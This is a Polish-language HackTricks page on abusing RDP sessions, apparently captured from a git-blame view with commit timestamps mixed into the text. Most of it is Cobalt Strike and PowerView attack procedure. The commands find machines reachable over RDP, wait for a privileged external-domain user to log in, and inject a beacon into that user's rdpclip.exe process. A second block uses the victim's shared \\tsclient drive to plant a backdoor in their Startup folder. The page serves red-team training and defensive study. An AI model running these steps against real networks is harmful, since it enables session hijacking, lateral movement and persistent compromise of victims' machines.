hacktricks/windows-hardening/active-directory-methodology/rdp-sessions-abuse.md

96 lines
5.4 KiB
Markdown
Raw Normal View History

2024-02-11 01:46:25 +00:00
# Wykorzystywanie sesji RDP
2022-08-16 00:18:24 +00:00
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Dowiedz się, jak hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-08-16 00:18:24 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2022-08-16 00:18:24 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-08-16 00:18:24 +00:00
</details>
2024-02-11 01:46:25 +00:00
## Wstrzykiwanie procesu RDP
2022-08-16 00:18:24 +00:00
2024-02-11 01:46:25 +00:00
Jeśli **grupa zewnętrzna** ma **dostęp RDP** do dowolnego **komputera** w bieżącej domenie, **atakujący może skompromitować ten komputer i czekać na niego**.
2022-08-16 00:18:24 +00:00
2024-02-11 01:46:25 +00:00
Gdy użytkownik uzyskał dostęp za pomocą RDP, **atakujący może przejść do sesji tego użytkownika** i wykorzystać jego uprawnienia w zewnętrznej domenie.
2022-08-16 00:18:24 +00:00
```powershell
# Supposing the group "External Users" has RDP access in the current domain
## lets find where they could access
## The easiest way would be with bloodhound, but you could also run:
Get-DomainGPOUserLocalGroupMapping -Identity "External Users" -LocalGroup "Remote Desktop Users" | select -expand ComputerName
#or
Find-DomainLocalGroupMember -GroupName "Remote Desktop Users" | select -expand ComputerName
# Then, compromise the listed machines, and wait til someone from the external domain logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
2024-02-11 01:46:25 +00:00
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
2022-08-16 00:18:24 +00:00
beacon> inject 4960 x64 tcp-local
## From that beacon you can just run powerview modules interacting with the external domain as that user
```
2024-02-11 01:46:25 +00:00
Sprawdź **inne sposoby kradzieży sesji za pomocą innych narzędzi** [**na tej stronie.**](../../network-services-pentesting/pentesting-rdp.md#session-stealing)
2022-08-16 00:18:24 +00:00
## RDPInception
2024-02-11 01:46:25 +00:00
Jeśli użytkownik uzyska dostęp za pomocą **RDP do maszyny**, gdzie **atakujący** na niego **czeka**, atakujący będzie w stanie **wstrzyknąć beacon w sesję RDP użytkownika**, a jeśli **ofiara zamontowała swoje dyski** podczas korzystania z RDP, **atakujący będzie mógł się do nich dostać**.
2022-08-16 00:18:24 +00:00
2024-02-11 01:46:25 +00:00
W tym przypadku można po prostu **skompromitować** **oryginalny komputer ofiary** poprzez zapisanie **tylnych drzwi** w **folderze uruchamiania**.
2022-08-16 00:18:24 +00:00
```powershell
# Wait til someone logs in:
net logons
Logged on users at \\localhost:
EXT\super.admin
# With cobalt strike you could just inject a beacon inside of the RDP process
beacon> ps
2024-02-11 01:46:25 +00:00
PID PPID Name Arch Session User
--- ---- ---- ---- ------- -----
...
4960 1012 rdpclip.exe x64 3 EXT\super.admin
2022-08-16 00:18:24 +00:00
beacon> inject 4960 x64 tcp-local
# There's a UNC path called tsclient which has a mount point for every drive that is being shared over RDP.
## \\tsclient\c is the C: drive on the origin machine of the RDP session
beacon> ls \\tsclient\c
2024-02-11 01:46:25 +00:00
Size Type Last Modified Name
---- ---- ------------- ----
dir 02/10/2021 04:11:30 $Recycle.Bin
dir 02/10/2021 03:23:44 Boot
dir 02/20/2021 10:15:23 Config.Msi
dir 10/18/2016 01:59:39 Documents and Settings
[...]
2022-08-16 00:18:24 +00:00
# Upload backdoor to startup folder
beacon> cd \\tsclient\c\Users\<username>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
beacon> upload C:\Payloads\pivot.exe
```
<details>
2024-02-11 01:46:25 +00:00
<summary><strong>Naucz się hakować AWS od zera do bohatera z</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-08-16 00:18:24 +00:00
2024-02-11 01:46:25 +00:00
Inne sposoby wsparcia HackTricks:
2022-08-16 00:18:24 +00:00
2024-02-11 01:46:25 +00:00
* Jeśli chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** lub **pobrać HackTricks w formacie PDF**, sprawdź [**PLAN SUBSKRYPCJI**](https://github.com/sponsors/carlospolop)!
* Zdobądź [**oficjalne gadżety PEASS & HackTricks**](https://peass.creator-spring.com)
* Odkryj [**Rodzinę PEASS**](https://opensea.io/collection/the-peass-family), naszą kolekcję ekskluzywnych [**NFT**](https://opensea.io/collection/the-peass-family)
* **Dołącz do** 💬 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegramowej**](https://t.me/peass) lub **śledź** nas na **Twitterze** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytoriów github.
2022-08-16 00:18:24 +00:00
</details>